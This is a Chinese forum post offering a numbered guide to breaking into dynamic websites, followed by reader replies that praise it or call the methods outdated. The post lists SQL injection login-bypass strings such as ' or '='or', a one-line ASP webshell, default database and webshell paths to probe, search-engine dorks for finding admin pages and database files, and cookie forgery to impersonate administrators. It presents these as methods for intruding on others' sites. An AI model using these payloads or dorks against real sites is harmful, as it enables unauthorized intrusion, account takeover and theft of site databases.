WEB入侵的心的和方法

首先介绍下什么样站点可以入侵 我认为必须是动态的网站 如ASP PHP JSP等代码编写的站点

如果是静态的（.htm或html）,一般是不会成功的。

1.上传漏洞

如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”，80%就有漏洞了！

有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传。

2.注入漏洞

字符过滤不严造成的

3.旁注,也就是跨站.

我们入侵某站时可能这个站坚固的无懈可击，我们可以找下和这个站同一服务器的站点，然后在利用这个站点用提权，嗅探等方法来入侵我们 要入侵的站点。

4.暴库:把二级目录中间的/换成%5c

5.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有：

’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a

6.社会工程学。就是猜解。 看技术好不好。

7.写入ASP格式数据库。就是一句话木马〈%execute request("value")%〉 （数据库必需得是ASP或ASA的后缀）

8.源码利用：一些网站用的都是网上下载的源码.有的站长很懒.什么也不改.

9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.

/Databackup/dvbbs7.MDB

/bbs/Databackup/dvbbs7.MDB

/bbs/Data/dvbbs7.MDB

/data/dvbbs7.mdb

/bbs/diy.asp

/diy.asp

/bbs/cmd.asp

/bbs/cmd.exe

/bbs/s-u.exe

/bbs/servu.exe

/等等 太多了 就不都说了

10.查看目录法:人一些网站可以断开目录，可以方问目录。

11.搜索引擎利用:

(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/

(2).找网站的管理后台地址:

site:xxxx.comintext:管理

site:xxxx.comintitle:管理 〈关键字很多，自已找〉

site:xxxx.cominurl:login

(3).查找access的数据库,mssql、mysql的连接文件

allinurl:bbsdata

filetype:mdbinurl:database

filetype:incconn

inurl:datafiletype:mdb

12.COOKIE诈骗：把自己的ID修改成管理员的，MD5密码也修改成他的，用桂林老兵工具可以修改COOKIE,还有名小子等。

13.利用常见的漏洞：如动网BBS

可以先用:dvbbs权限提升工具，使自已成为前台管理员。

THEN，运用:动网固顶贴工具，找个固顶贴，再取得COOKIES，这个要你自已做。我们可以用WSockExpert取得Cookies/NC包 。

大家一定要支持哦 我会不定期 发新贴 哦

呵呵，看来你只会攻击asp类型网站，呵呵。。。。

我觉得现在很多网站都更新了 一般情况很难直接弄下

第六条@@18!!

既然让找，我就给你找一下啦 http://wenku.baidu.com/view/5187525777232f60ddcca1f0.html

http://www.hackbase.com/tech/2006-01-03/35883.html

http://www.myhack58.com/Article/html/3/8/2007/17642.htm

http://download.csdn.net/detail/anglish/1936167

http://blog.renren.com/share/232030046/1148178691

。。。。

。。。

还有一大堆，我也就不说了。还有我说一下，现在你这些东西已经很老很老了

上传漏洞？现在1000个站点里面有1个已经算你中彩票了，再说SQL注入？这个是目前主流的，不过更多的是XSS。再说旁注，基本更找上传差不多。再说%5c"暴库法。这东西在3年前还可能，还必须是asp的。现在可能性为0，or=or?这个东西现在直接为0。社工在这儿不说了，还有什么默认数据库利用，这目前还是不可能。搜索引擎利用，就你这儿列举的这些东西，还是为0，就算是有，早被别人轮爆了，cookies这目前利用还算可以，下面的也是一样，不常用，抓包改包，比较多。我的博客http://www.graynight.org/

#43t大神

=0= 好恐怖……

社会工程学不一定是猜解 社工可以骗取站长的信任执行你的木马文件之类的东东玩的是心理战 也是非常难防御的手段

哟西 我啥也听不懂

好贴 虽然现在不怎么懂 收藏先

现在在外地，在家都写好了。回去就更新。

什么时候更新啊！亲！

算是汇总了 ！不错，经验集合贴，求更新！更新细节！可以继续添加linux和unix！

虽然之前看过，但是真心没有实践过呢

要有连载么 加油吧=////=

入侵不单单有注入简单的活

表示只会用sql注入方式、、